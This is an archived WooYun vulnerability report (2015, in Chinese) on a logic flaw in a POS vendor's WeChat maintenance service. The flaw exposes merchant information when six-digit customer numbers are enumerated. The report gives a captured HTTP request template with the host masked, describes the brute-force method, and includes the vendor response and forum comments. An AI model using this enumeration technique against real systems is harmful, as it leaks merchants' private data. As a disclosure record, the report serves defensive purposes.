当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145185

漏洞标题:POS机安全之爱特POS某运维系统逻辑漏洞泄漏所有商户信息

相关厂商:互联网应急中心

漏洞作者: 路人甲

提交时间:2015-10-07 16:09

修复时间:2015-11-26 16:14

公开时间:2015-11-26 16:14

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-07: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经确认,细节仅向厂商公开
2015-10-22: 细节向核心白帽子及相关领域专家公开
2015-11-01: 细节向普通白帽子公开
2015-11-11: 细节向实习白帽子公开
2015-11-26: 细节向公众公开

简要描述:

可泄漏所有商户信息

详细说明:

问题出现在微信端的 爱特POS运维服务
点击我的信息,发现只要输入客户号即可查看信息
抓包

POST /schoolweb_pos/posweixin.do?action=CheckReg&telno=&vcode=&v=1444199863057&regcode=123456&weixinid=oo0w6t-B0Nnjkeh9tY04gTxf8dbE HTTP/1.1
Host: **.**.**.**
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Proxy-Connection: keep-alive
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Origin: http://**.**.**.**
Content-Length: 0
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_0 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13A342 MicroMessenger/6.3.1 NetType/WIFI Language/zh_CN
Referer: http://**.**.**.**/schoolweb_pos/posweixin.do?action=weixin_index&weixinid=oo0w6t-B0Nnjkeh9tY04gTxf8dbE&act=reg
Cookie: JSESSIONID=79A25FD52143C14B071E609A4E975E63


客户号为6位数字 我用123456测试下 看下返回值

1.jpg


2.jpg


然后对6位商户号进行遍历

4.jpg


5.jpg


6.jpg


漏洞证明:

然后对6位商户号进行遍历

4.jpg


5.jpg


6.jpg

修复方案:

完善逻辑

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-10-12 16:13

厂商回复:

暂未建立与网站管理单位的直接处置渠道,待认领.

最新状态:

暂无

漏洞评价:

评论

  1. 2015-10-07 16:13 | king7 ( 普通白帽子 | Rank:620 漏洞数:113 | 收WB~~1:7手续费协商,个位数到三位数量都...)

    这个表哥有点6,强行POS鸡

  2. 2015-10-07 20:01 | DNS ( 普通白帽子 | Rank:475 漏洞数:59 | 没有我,你们就去背IP吧)

    @king7 特么不是你啊

  3. 2015-10-07 20:29 | Martial ( 普通白帽子 | Rank:1420 漏洞数:218 )

    @DNS 66666

  4. 2015-10-07 22:16 | king7 ( 普通白帽子 | Rank:620 漏洞数:113 | 收WB~~1:7手续费协商,个位数到三位数量都...)

    @DNS 我以为我承包了乌云pos鸡的,没想到还有别的表哥也开始搞了